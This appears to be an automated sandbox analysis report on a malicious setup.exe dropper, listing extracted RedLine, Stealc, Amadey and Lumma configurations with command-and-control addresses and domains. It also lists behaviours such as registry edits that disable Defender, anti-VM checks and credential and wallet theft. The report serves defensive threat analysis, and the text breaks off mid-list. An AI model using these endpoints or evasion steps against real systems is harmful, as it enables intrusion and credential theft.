Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10/07/2024, 10:00
Static task
static1
Behavioral task
behavioral1
Sample
1720605557.036432_setup.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral2
Sample
1720605557.036432_setup.exe
Resource
win11-20240709-en
General
-
Target
1720605557.036432_setup.exe
-
Size
4.6MB
-
MD5
9e575ff2f94976a6e73a0a219bbf2495
-
SHA1
426e0a6231d75e6bd9be1abd8a25104f162f0a2a
-
SHA256
fecffd8f6cdd8ad950507bebbb23a146ec5252e35be146840ded98dff189cf12
-
SHA512
97c59f9977ace5e6612023f1f43fb6aa2d1a6a3c507a89b03d452b1688277665d91294c084fb786a83743f98899a8d76ec30bb235163a7d688d8bed25ed5b09e
-
SSDEEP
98304:YdJFj+HRyphoM7jEYB2aqAcpL/3Pq2EMA2TaZjpGLX:YdJFuRUEK235pL/fqiupG
Malware Config
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
77.105.135.107:3445
Extracted
stealc
hate
http://85.28.47.30
-
url_path
/920475a59bac849d.php
Extracted
amadey
4.30
4dd39d
http://77.91.77.82
-
install_dir
ad40971b6b
-
install_file
explorti.exe
-
strings_key
a434973ad22def7137dbb5e059b7081e
-
url_paths
/Hun4Ko/index.php
Extracted
lumma
https://radiationnopp.shop/api
https://bouncedgowp.shop/api
https://bannngwko.shop/api
https://begghurldids.shop/api
https://bargainnykwo.shop/api
https://affecthorsedpo.shop/api
https://answerrsdo.shop/api
https://publicitttyps.shop/api
https://benchillppwo.shop/api
https://reinforcedirectorywd.shop/api
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Modifies firewall policy service 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 1720605557.036432_setup.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/1488-325-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 5888 created 2900 5888 Valve.pif 48 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ IEHCBAFIDA.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorti.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 397 2288 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 1688 powershell.exe 2120 powershell.exe 1936 powershell.EXE 2732 powershell.EXE 3256 powershell.EXE 3220 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 11 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IEHCBAFIDA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IEHCBAFIDA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorti.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation J6fxPfjrVIW7mWC7xutZfIbr.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation vGt3OVFeh3LKSHl0V_ykKREk.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation explorti.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation d9c692739d.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation EydzSrR.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation 1720605557.036432_setup.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation IEHCBAFIDA.exe Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberPanther.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberPanther.url cmd.exe -
Executes dropped EXE 31 IoCs
pid Process 3508 UGQuOY1kqdT13agDjIG0YZtu.exe 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 1008 bjUQ36IFj2PoHA0sQz8TBXsB.exe 2060 J6fxPfjrVIW7mWC7xutZfIbr.exe 4056 YexdmzcdPLggRapv4HZlLGD4.exe 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 3612 Nbv2eat128G6GNOjYYnBYhR2.exe 2376 XB3ki0WHFBZujbRpDk6IaoK0.exe 2200 uN3YmJE65MD_PlWriUaT7fWG.exe 5080 KAcc9RI3MiOBAHUXgUxfxdaV.exe 2416 caCdoHEiuMALDE1JSHligKNP.exe 4672 nup4TOcCS6dP9db5MzHsOwiV.exe 4620 nup4TOcCS6dP9db5MzHsOwiV.tmp 4304 Install.exe 2176 Install.exe 5292 audioshell.exe 5236 Install.exe 5336 Install.exe 5544 audioshell.exe 5888 Valve.pif 6004 IEHCBAFIDA.exe 4288 explorti.exe 456 eqtpkqwqodik.exe 6052 Install.exe 1576 Install.exe 3336 explorti.exe 6096 d9c692739d.exe 5932 lEOjaxW.exe 3656 explorti.exe 1616 EydzSrR.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Wine IEHCBAFIDA.exe Key opened \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Wine explorti.exe Key opened \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Software\Wine explorti.exe -
Loads dropped DLL 4 IoCs
pid Process 4620 nup4TOcCS6dP9db5MzHsOwiV.tmp 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 2288 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json EydzSrR.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json EydzSrR.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini EydzSrR.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 118 iplogger.org 119 iplogger.org -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 api.myip.com 14 api.myip.com 18 ipinfo.io 19 ipinfo.io -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 4208 powercfg.exe 1548 powercfg.exe 32 powercfg.exe 4328 powercfg.exe 5404 powercfg.exe 5728 powercfg.exe 4756 powercfg.exe 2528 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000a00000002359b-841.dat autoit_exe -
Drops file in System32 directory 37 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 EydzSrR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content EydzSrR.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 1720605557.036432_setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 1720605557.036432_setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE EydzSrR.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol EydzSrR.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 EydzSrR.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 EydzSrR.exe File opened for modification C:\Windows\System32\GroupPolicy 1720605557.036432_setup.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 1720605557.036432_setup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EydzSrR.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 EydzSrR.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid Process 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 980 vGt3OVFeh3LKSHl0V_ykKREk.exe 6004 IEHCBAFIDA.exe 4288 explorti.exe 3336 explorti.exe 3656 explorti.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 2332 set thread context of 2532 2332 R2jjJpprj1ufPZ1cttEEna1Z.exe 151 PID 4992 set thread context of 1488 4992 DxoA6Bdpb0h3bT4kFUIqeS3K.exe 112 PID 2376 set thread context of 5184 2376 XB3ki0WHFBZujbRpDk6IaoK0.exe 120 PID 3612 set thread context of 5204 3612 Nbv2eat128G6GNOjYYnBYhR2.exe 121 PID 1008 set thread context of 5464 1008 bjUQ36IFj2PoHA0sQz8TBXsB.exe 147 PID 2416 set thread context of 5664 2416 caCdoHEiuMALDE1JSHligKNP.exe 152 PID 456 set thread context of 4996 456 eqtpkqwqodik.exe 185 PID 456 set thread context of 5768 456 eqtpkqwqodik.exe 186 -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\qMeQRvtmXyxU2\KVMJUIGXKGYDD.dll EydzSrR.exe File created C:\Program Files (x86)\qMeQRvtmXyxU2\eeQeSZL.xml EydzSrR.exe File created C:\Program Files (x86)\ixMyiQryENPMC\GVnXfSv.xml EydzSrR.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak EydzSrR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja EydzSrR.exe File created C:\Program Files (x86)\WIQLPldOU\GxKSAzb.xml EydzSrR.exe File created C:\Program Files (x86)\fjxFshYjVWUn\wDQyRaA.dll EydzSrR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi EydzSrR.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak EydzSrR.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\UKAgkwh.xml EydzSrR.exe File created C:\Program Files (x86)\WIQLPldOU\VJIXGD.dll EydzSrR.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi EydzSrR.exe File created C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\fmDlZsr.dll EydzSrR.exe File created C:\Program Files (x86)\ixMyiQryENPMC\uLsrUsm.dll EydzSrR.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\Tasks\blQxnfAaNNFZMWpemd.job schtasks.exe File created C:\Windows\Tasks\bMfeDuSmKBAGoOfQBS.job schtasks.exe File created C:\Windows\Tasks\explorti.job IEHCBAFIDA.exe File created C:\Windows\Tasks\NEaCSBqXysBCPlvqA.job schtasks.exe File created C:\Windows\Tasks\AxfyqSaZTcFttLJtv.job schtasks.exe File created C:\Windows\Tasks\zuAKRFeuERsPXGg.job schtasks.exe File created C:\Windows\Tasks\cTixPRTTdvXlYhynT.job schtasks.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2988 sc.exe 3976 sc.exe 5364 sc.exe 5168 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 5488 2332 WerFault.exe 2532 3508 WerFault.exe 95 4412 5184 WerFault.exe 120 6084 5204 WerFault.exe 121 2180 6052 WerFault.exe 196 4736 5932 WerFault.exe 284 5404 5888 WerFault.exe 135 5640 1576 WerFault.exe 197 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI UGQuOY1kqdT13agDjIG0YZtu.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI UGQuOY1kqdT13agDjIG0YZtu.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI UGQuOY1kqdT13agDjIG0YZtu.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vGt3OVFeh3LKSHl0V_ykKREk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 vGt3OVFeh3LKSHl0V_ykKREk.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5268 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 5640 tasklist.exe 5696 tasklist.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket EydzSrR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{07cdb6ea-0000-0000-0000-d01200000000}\NukeOnDelete = "0" EydzSrR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created 